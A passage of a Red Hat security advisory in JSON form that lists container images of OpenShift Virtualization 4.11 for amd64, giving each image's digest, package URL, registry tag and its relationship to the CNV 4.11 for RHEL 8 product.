"product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.11.0-54"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator\u0026tag=v4.11.0-29"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status\u0026tag=v4.11.0-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"product_id": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.11.0-17"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"product": {
"name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"product_id": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"product_id": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"product_id": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.11.0-26"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"product": {
"name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"product_id": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"product": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"product_id": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"product_id": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"product_id": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"product_id": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"product_id": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.11.0-59"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"product": {
"name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"product_id": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"product": {
"name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"product_id": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"product": {
"name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"product_id": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.11.0-16"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"product": {
"name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"product_id": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"product": {
"name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"product_id": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.11.0-106"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64",
"product": {
"name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64",
"product_id": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup\u0026tag=v4.11.0-67"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64"
},
"product_reference": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64"
},
"product_reference": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64"
},
"product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64"
},
"product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64"
},
"product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64"
},
"product_reference": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64"
},
"product_reference": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64"
},
"product_reference": "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64"
},
"product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"relates_to_product_reference": "8Base-CNV-4.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64 as a component of CNV 4.11 for RHEL 8",
"product_id": "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64"
},
